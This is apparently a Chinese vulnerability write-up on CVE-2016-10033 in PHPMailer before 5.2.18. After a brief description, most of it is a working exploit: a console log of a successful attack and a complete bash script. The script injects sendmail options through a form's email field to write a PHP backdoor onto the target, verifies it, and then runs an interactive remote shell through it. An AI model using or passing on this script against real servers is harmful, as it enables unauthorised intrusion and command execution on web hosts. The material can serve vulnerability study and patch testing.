（CVE-2016-10033）PHPMailer___5.2.18_远程命令执行漏洞

# （CVE-2016-10033）PHPMailer < 5.2.18 远程命令执行漏洞 ============== 一、漏洞简介 ------------ PHPMailer 5.2.18之前的版本存在一个漏洞，该漏洞可能导致远程代码执行（RCE）。如果未设置Sender属性，则PHPMailer的isMail传输中的mailSend函数可能会允许远程攻击者将额外的参数传递给mail命令，从而通过在预制的发件人地址中使用"（反斜杠双引号）执行任意代码。 二、漏洞影响 ------------ PHPMailer \< 5.2.18 三、复现过程 ------------ ### poc root@kali:~/CVE-2016-10033# ./exploit.sh www.0-sec.org:8080 [+] CVE-2016-10033 exploit by opsxcq [+] Exploiting www.0-sec.org:8080 [+] Target exploited, acessing shell at http://www.0-sec.org:8080/backdoor.php [+] Checking if the backdoor was created on target system [+] Backdoor.php found on remote system [+] Running whoami www-data RemoteShell> ls
[+] Running ls
vulnerable
RemoteShell> pwd
[+] Running pwd
/www
CVE-2016-10033.sh
#!/bin/bash
# CVE-2016-10033 exploit by opsxcq
# https://github.com/opsxcq/exploit-CVE-2016-10033

echo ‘[+] CVE-2016-10033 exploit by opsxcq’

if [ -z “$1” ]
then
echo ‘[-] Please inform an host as parameter’
exit -1
fi

if [ $(uname) == ‘Darwin’ ]
then
decoder=’base64 -D’
elif [ $(uname) == ‘Linux’ ]
then
decoder=’base64 -d’
else
echo ‘[-] Your platform isnt supported: ‘$(uname)
exit -1
fi

host=$1

echo ‘[+] Exploiting ‘$host

curl -sq ‘http://’$host -H ‘Content-Type: multipart/form-data; boundary=—-WebKitFormBoundaryzXJpHSq4mNy35tHe’ –data-binary $’——WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name=”action”\r\n\r\nsubmit\r\n——WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name=”name”\r\n\r\n\r\n——WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name=”email”\r\n\r\n\”vulnerables\\\” -OQueueDirectory=/tmp -X/www/backdoor.php server\” @test.com\r\n——WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name=”message”\r\n\r\nPwned\r\n——WebKitFormBoundaryzXJpHSq4mNy35tHe–\r\n’ >/dev/null && echo ‘[+] Target exploited, acessing shell at http://’$host’/backdoor.php’

echo ‘[+] Checking if the backdoor was created on target system’
code=$(curl -o /dev/null –silent –head –write-out ‘%{http_code}\n’ “http://$host/backdoor.php”)

if [ “$code” != “200” ]
then
echo ‘[-] Target cant be exploited’
exit -1
else
echo ‘[+] Backdoor.php found on remote system’
fi

cmd=’whoami’
while [ “$cmd” != ‘exit’ ]
do
echo ‘[+] Running ‘$cmd
if ! curl -sq http://$host/backdoor.php?cmd=$(echo -ne $cmd | base64) | grep ‘|’ | grep -v ‘base64_encode’ | head -n 1 | cut -d ‘|’ -f 2 | $decoder
then
echo ‘[-] Connection problens’
exit -1
fi
echo
read -p ‘RemoteShell> ‘ cmd
done
echo ‘[+] Exiting’